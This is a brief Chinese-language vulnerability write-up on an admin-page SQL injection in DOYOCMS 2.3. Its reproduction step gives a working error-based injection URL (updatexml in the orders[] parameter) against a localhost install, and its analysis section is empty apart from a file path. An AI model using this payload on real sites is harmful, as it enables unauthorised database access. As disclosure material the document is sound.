简要描述

doyoCMS管理页面SQL注入漏洞。
 
 

影响版本

DOYOCMS 2.3
 
 

漏洞分析

sourceadmina_classtypes.php


 
 

漏洞复现

登录到管理页面,然后输入网址:

http://localhost/DOYO_2.3_20130118/admin.php?c=a_classtypes&a=alledit&orders[]=1%27%20or%20updatexml(2,concat(0x7e,(version())),0)%20or%27